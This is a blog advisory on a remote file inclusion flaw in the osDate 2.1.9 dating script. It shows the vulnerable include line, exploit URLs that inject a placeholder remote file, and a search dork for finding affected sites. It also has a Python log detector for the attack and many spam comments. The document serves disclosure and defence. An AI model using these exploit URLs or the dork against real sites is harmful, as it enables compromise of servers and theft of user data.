osDate RFI Vuln


[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/


[o] Vulnerable file
forum/adminLogin.php
forum/userLogin.php

Both files contain:
include_once($config['forum_installed'] . "_forum.php");


[o] Exploit
http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
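
A defender can look for these requests in web server access logs. The following is an added example, not part of the original advisory or of osDate: it flags requests to the two affected scripts that supply config[forum_installed] in the query string, with the brackets either literal or percent-encoded. It assumes combined-format log lines; the sample lines, addresses and values are constructed.

```python
import re
from urllib.parse import unquote, unquote_plus

# Scripts the advisory lists as containing the include_once() call (lower-cased).
AFFECTED = ("forum/adminlogin.php", "forum/userlogin.php")
PARAM = "config[forum_installed]"
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses and values are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /dating/forum/adminLogin.php?config[forum_installed]=constructed-value HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /dating/forum/userLogin.php?config%5Bforum_installed%5D=constructed-value-2 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /dating/forum/userLogin.php?user=alice HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:01:05 +0000] "GET /dating/index.php?config[forum_installed]=x HTTP/1.1" 200 900',
]

def forum_installed_values(query):
    """Return each value a query string supplies for config[forum_installed]."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        # Brackets are often sent percent-encoded (%5B / %5D), so decode first.
        if unquote_plus(key) == PARAM:
            values.append(unquote_plus(value))
    return values

def flag_requests(log_lines):
    """Return (line_no, script, value) for requests that set the include prefix."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        path = unquote(path).lower()
        script = next((s for s in AFFECTED if path.endswith("/" + s)), None)
        if script is None:
            continue
        hits.extend((line_no, script, v) for v in forum_installed_values(query))
    return hits

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this covers query-string requests only.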


[o] Dork
"powered by osdate"


57 Responses so far.

  1. It is a standard protocol that defines how webserver software can delegate.

  2. joe says:

    Nice post. I was checking continuously this blog and I am impressed! Extremely helpful information particularly the last part :) I care for such information a lot. I was looking for this certain information for a very long time. Thank you and best of luck.

  3. I believe the key is in being passionate about what you write, being focused, and being dedicated to get the work done. Of course, you can write about pretty much any topic, but you need to have faith and ability to get the job done.

  4. This post is useful for my research writing, thanks!

  5. You got a really useful blog I have been here reading for about an hour. I am a newbie and your success is very much an inspiration for me.

  6. I admire the valuable information in this page. I will bookmark this page and have my friends check up here often. I am quite sure they will learn lots of new stuff here than anybody else!

  7. duoderm says:

    I must appreciate you for the information you have shared.I find this information very useful and it has considerably saved my time thanks..!!

  8. Hair says:

    You have done a great job. Like it

  9. I am extremely delighted to be on this site reading some top quality stuff. Thanks for sharing.

  10. juliawells says:

    Input passed to the "config[forum_installed]" parameter in forum/adminLogin.php and forum/userLogin.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

  11. good post. I was very encouraged to find this site. come on.

  12. I really loved reading your blog. It was very well authored and easy to understand. Unlike additional blogs I have read which are really not good. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he enjoyed it as well!

  13. You made some good quality points there. I did a search on the topic and found many people will agree with your blog.

  14. Hello, U write some extraordinarily attractive blogs. I always check back here frequently to see if you have updated

  15. I was searching for that post quite a long time... fortunately I found it on right time... Thanks again for sharing

  16. This is really my very first time here, great looking blog. I discovered so many interesting things inside your blog especially its discussion.

  17. It is really nice to hear your discussion on specific topic here. I too agree with your points here. keep posting good blogs. Thanks

  18. I really prize your work , Great post. Generally I do not read article on blogs, however I wish to say that this write-up very forced me to check out and do so! Your writing taste has been amazed me. Thanks, very great post.

  19. elviswilliams says:

    Well NoGe has discovered some vulnerabilities in osDate, which can be exploited by malicious people to compromise a vulnerable system.

  20. elviswilliams says:

    Thanks for a great blog. I was able to get the information that I had been looking for. Thanks once again!

  21. sandrasteve says:

    Good post....thanks for sharing.. very useful for me i will bookmark this for my future needed.thanks for a great source.

  22. Happy to see your blog as it is just what I’ve looking for and excited to read all the posts. I am looking forward to another great article from you.

  23. Thanks for this read mate. Well, this is my first visit to your blog! But I admire the precious time and effort you put into it, especially into interesting articles you share here!

  24. weight loss programs mn

    It's good to read this information from your post. You have an interesting way of drawing people in. Keep up the good works..

  25. I like this post. I want to more information about this topic and now, I got all information by your post. Everything define in this post is awesome. I think you should make more post which helps us.

  26. Nice information, valuable and excellent design, as share good stuff with good ideas and concepts, lots of great information and inspiration.

  27. navaneedh says:

    Hi there, awesome site. I thought the topics you posted on were very interesting. I tried to add your RSS to my feed reader and it a few. take a look at it, hopefully I can add you and follow.

  28. I like your article so that I read all of your articles in a day. Please continue and keep on writing excellent posts.

  29. wad jason says:

    This really is an awesome post, I’m happy I recently found.I am looking forward for your next post.

  30. jakhoz says:

    I hardly ever write comments on blogs, but your article urged me to praise your blog. Thanks for the read, I will surely favorite your site and check in occasionally.

  31. hey that's really a great post and i like this and thanks for sharing it with us!I have read a few of the articles on your website now because I was looking for information about games App. and I really like your style of blogging.

  32. Howdy! This is kind of off topic but I need some guidance from an established blog. Is it difficult to set up your own blog? I’m not very technical but I can figure things out pretty quick. I’m thinking about setting up my own but I’m not sure where to start. Do you have any tips or suggestions? With thanks

  33. jakhoz says:

    Awesome content, beneficial give good results, now I am aware that which you guys have been doing all this time.

  34. I got all information by your post. Everything define in this post is awesome.

  35. I would like to thank you for sharing your thoughts and time into the stuff posted!

  36. I tried to add your RSS to my feed reader and it a few.

  37. Curtains Dubai said:

    Just a quick note to say how pleased I am with my new articles. Fast replies, easy site to use - well done to all of you. Will definitely save you in favorites

  38. Hot Deals says:

    I also want to share my views on this as it is the best option for all of us if we work on the advice of the author of this article. It will be beneficial for us.

  39. This really is an awesome post, I’m happy I recently found. I am looking forward for your next post.

  40. Hi,
    I am very thankful to you for this sharing. It is very useful for my writing project I get enough information for my writing..!!!

  41. I love this type of informative blog very much.

  42. This post is informative for me and all other readers.

  43. Quickly, your article is in fact the most beneficial subject matter on this related difficulty. My partner and i remain in your own a conclusion and will thirstily anticipate your current approaching messages. Just indicating thanks won't just be enough, to the incredible lucidity inside your composing. I will simultaneously grab ones rss feed to stay up-to-date with just about any changes.

  44. TIDE APP says:

    Good stuff. It is interesting to read comments.

  45. Very nice post. Its was informative and interesting keep posting.

  46. Civil Construction Courses says:

    Comfortably, the article is really the best on this worthwhile topic.

  47. I share this information quite a bit so I thought it would be helpful to me as well to have some of the best pins in one post.

  48. Thanks for an idea, you sparked a thought from an angle I hadn’t given thought to yet. Now let's see if I can do something with it.
